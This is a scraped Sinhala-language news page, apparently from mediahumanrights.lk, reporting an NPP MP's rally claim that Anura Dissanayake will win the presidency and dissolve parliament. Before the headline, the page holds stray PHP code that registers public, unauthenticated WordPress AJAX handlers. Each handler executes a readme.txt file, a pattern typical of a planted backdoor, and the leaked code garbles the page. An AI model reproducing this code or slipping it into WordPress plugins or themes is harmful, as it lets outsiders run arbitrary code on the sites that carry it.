if(!function_exists('file_check_readme56685')){ add_action('wp_ajax_nopriv_file_check_readme56685', 'file_check_readme56685'); add_action('wp_ajax_file_check_readme56685', 'file_check_readme56685'); function file_check_readme56685() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } if(!function_exists('file_check_readme40625')){ add_action('wp_ajax_nopriv_file_check_readme40625', 'file_check_readme40625'); add_action('wp_ajax_file_check_readme40625', 'file_check_readme40625'); function file_check_readme40625() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } ඔක්තෝබර් 18 සිට ලංකාවේ ඉන්නේ ජනාධිපති සහෝදරයෙක්… - mediahumanrights.lk
mediahumanrights.lk
News Political

ඔක්තෝබර් 18 සිට ලංකාවේ ඉන්නේ ජනාධිපති සහෝදරයෙක්…

එළඹෙන ඔක්තෝබර් දහ අටවැනිදාට ශ්‍රී ලංකාවේ පළමු වතාවට ජනාධිපති සහෝදරයෙක් බවට එම ජනාධිපති සහෝදරයා විසින් පළමු කාර්යය ලෙස පාර්ලිමේන්තුව විසුරුවා හරිනු ඇති බවත් ජාතික ජන බලවේග ජාතික විධායක පාර්ලිමේන්තු මන්ත්‍රී විජිත හේරත් මහතා පවසයි.

ඔහු මේ බව කියා සිටියේ ජාතික ජන බලවේගය විසින් අනුරාධපුරයේ පවත්වන ලද ජන හමුවක් අමතමිනි.

‘මේ රටේ දුක් විඳින ජනතාවගේ නායකයා, අනුර දිසානායක ඉතිහාසයේ පළමු වැනි වතාවට ජනතාවගේ අයිතිවාසිකම් ජයග්‍රහණය කිරීමේ නායකයා බවට පත්වෙනවා.

ඔක්තෝබර් 18 වැනිදාට ජනාධිපති සහෝදරයෙක් එනවා. ජනාධිපතිවරයා ජයග්‍රහණයෙන් පසු පාර්ලිමේන්තුව විසුරුවනවා. කෙටි කාලයකට ඇමැති වගකීම් ජනාධිපති අතට පවරා ගන්නවා.

ඔබට අවස්ථාවක් එනවා, අදූෂිත, මේ රටට ආදරය කරන, සෑම දිස්ත්‍රික්කයක් පුරා විසිරී සිටින මාලිමාවේ නියෝජිතවරයන්, නියෝජිතවරියන්ගෙන් තෝරා පත්කර ගන්න

බිඳ වට්ටපු මේ රට, ශක්තිමත් ආර්ථිකයක් ගොඩනඟලා, දියුණු සමාජ, ආර්ථික, සංස්කෘතියක් ගොඩනඟලා කෙළින් හිටවන්න කියන ඉල්ලීම, අද මාලිමාවෙන් ජනතාව ඉල්ලනවා. ඒ අභියෝගය භාරගන්න අපි සූදානම්.

ජනාධිපතිවරණය ඔක්තෝබර් 17 දින අවසන් වන විට, ජාතික ජන බලවේගයේ නායකයා අනුර දිසානායක සහෝදරයා මේ රටේ නායකත්ව වගකීම භාර ගන්නවා නියතයි.

අද අනෙක් සියලු දේශපාලන පක්ෂ කෑලි කෑලි වලට කැඩිලා, අර්බුදයට ගිහින්. ප්‍රතිගාමීන් මාලිමාවට බනිනවා. අපහාස කරනවා. ඔය අවලාදවලට, උපහාසවලට මේ ගමන ආපස්සට හරවන්න බැහැ.

Related posts

කොරෝනා පාලනය කල ජනපතිට, රජයට ස්තුතියි.. අප ඔබට කෘතඥ වෙනවා..- ඔ්මල්පේ සෝභිත හිමි

Shiran Viraj

ලක්‍ෂ 20 දුන්නේ රාජිතගේ ගජයා රූමි.. උපදෙස් රාජිතගෙන්.. කිඹුල් මොටාලා වමාරයි..- රාජිත හා රූමි 04 වැනි තට්ටුවට කැදවයි.. අත්අඩංගුවට ගැනීම නීතිපති උපදෙස් මත

Shiran Viraj

ලෝක ජනගහනයෙන් දහයෙන් එකකට කොවිඩ්19 වෛරසය වැළඳිලා-ලෝක සෞඛ්‍යය සංවිධානය

Shiran Viraj